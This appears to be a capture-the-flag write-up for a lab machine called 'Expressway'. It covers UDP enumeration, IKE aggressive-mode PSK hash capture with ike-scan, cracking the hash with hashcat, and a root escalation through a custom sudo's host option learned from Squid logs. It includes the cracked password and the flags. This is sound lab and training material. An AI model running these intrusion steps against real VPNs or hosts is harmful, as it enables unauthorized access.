Expressway

10.129.238.52

Enumeration

NMAP

nmap -sC -sV -T4 10.129.238.52
nmap -p- -sC -sV 10.129.238.52

22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -A -sU --top-port 100 10.129.238.52

68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
500/udp  open          isakmp?
| ike-version: 
|   attributes: 
|     XAUTH
|_    Dead Peer Detection v1.0
| fingerprint-strings: 
|   IKE_MAIN_MODE: 
|_    "3DUfw
4500/udp open|filtered nat-t-ike
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port500-UDP:V=7.94SVN%I=7%D=1/11%Time=69645C2A%P=x86_64-pc-linux-gnu%r(
SF:IKE_MAIN_MODE,70,"\0\x11\"3DUfw\x87=\x10\x87\xe0\x8ab\x0b\x01\x10\x02\0
SF:\0\0\0\0\0\0\0p\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\
SF:0\x20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x
SF:01\x80\x0b\0\x01\x80\x0c\0\x01\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\0\0\0
SF:\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0")%r(IPSEC_START,
SF:9C,"1'\xfc\xb08\x10\x9e\x89\r#\xf6\xa2\x13\xe1=\x01\x01\x10\x02\0\0\0\0
SF:\0\0\0\0\x9c\r\0\x004\0\0\0\x01\0\0\0\x01\0\0\0\(\x01\x01\0\x01\0\0\0\x
SF:20\x01\x01\0\0\x80\x01\0\x05\x80\x02\0\x02\x80\x04\0\x02\x80\x03\0\x03\
SF:x80\x0b\0\x01\x80\x0c\x0e\x10\r\0\0\x0c\t\0&\x89\xdf\xd6\xb7\x12\r\0\0\
SF:x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\0\r\0\0\x18@H\xb7\x
SF:d5n\xbc\xe8\x85%\xe7\xde\x7f\0\xd6\xc2\xd3\x80\0\0\0\0\0\0\x14\x90\xcb\
SF:x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f");
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

ISAKMP (UDP 500) IPsec VPN

sudo ike-scan -M 10.129.238.52

10.129.238.52	Main Mode Handshake returned
	HDR=(CKY-R=c1e38d873424211f)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 
	Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
  • Trying an IKE aggressive-mode scan
sudo ike-scan -A 10.129.238.52

10.129.238.52	Aggressive Mode Handshake returned HDR=(CKY-R=7ed1b0fbbe63f18b) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
  • Capturing the 20-byte hash
sudo ike-scan -M -A 10.129.238.52 -n ike@expressway.htb --pskcrack=hash.txt

10.129.238.52	Aggressive Mode Handshake returned
	HDR=(CKY-R=80c8a3c8784ae941)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 
	Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)
cat hash.txt
ca4ee2a7e7a9bf0259e2b7af895d41ac97457e468dd2fd0454107e128c4178475e86a548925e2ab9a65096b055f12dcae0c8e5f1f0d4fc664a874144b0393d653013b20ba67a55c6f2a5f5f993fca66ec04a5a5cb0dcfd8850ed0bcb5f56202b5388e62413695676535b16a50e1ed2085c0aa99637f00a3e4fde1f05a96de4b3:d88380a8fc39bb97f7ea923d928d18379981eaccc33057e4b5cb34248e9ddd337e4b277431cf4aceb549d6da09b3ba2733cafa4ed044789500528269aef0d724b3b1d2bd5345879592979e50e1cf38e06ebc7adeb52e55ba678fcbd5313ca090cd827266aaf36366de43ea1af67c3c303966eda7d54604fa35b0b6c4241b52a1:80c8a3c8784ae941:58519064f618ccee:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:7847c92b632c1ea97985b77b79b4ffba4b59d389:597bafe713191c55d5274f3e4d78f3e19ecbdc1564b027d378e947548d8a06df:bb2f55dc075a94dcf45bc22cf2f09bb8045abd11
  • Cracking the hash
hashcat hash.txt /usr/share/wordlists/rockyou.txt

freakingrockstarontheroad

Logging in as ike

ike@expressway:~$ cat user.txt
da91dd9f50bd7e6b96901cfc7fd0c76a
  • Transferring LinPEAS
scp linpeas.sh  ike@10.129.238.52:/home/ike
  • No findings from LinPEAS

Escalating Privileges

ike@expressway:/etc/init.d$ sudo -l
Password: 
Sorry, user ike may not run sudo on expressway.
ike@expressway:/etc/init.d$ id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

This is a non-standard message; the stock sudo denial says that the user is not in the sudoers file.

which sudo

/usr/local/bin/sudo
  • Displays a custom path instead of the expected /usr/bin/sudo
  • Checking the Squid logs, readable as a member of the proxy group
cd /var/log/squid
cat access.log.1
1753229688.902      0 192.168.68.50 TCP_DENIED/403 3807 GET http://offramp.expressway.htb - HIER_NONE/- text/html
  • The log reveals an internal hostname, offramp.expressway.htb
  • sudo has a -h (host) option, which can be used to apply a hostname-based sudoers policy
/usr/local/bin/sudo -h offramp.expressway.htb -i

root@expressway:~# cat root.txt
cb358c6354ac5fc6bb37f5eefca5ec2c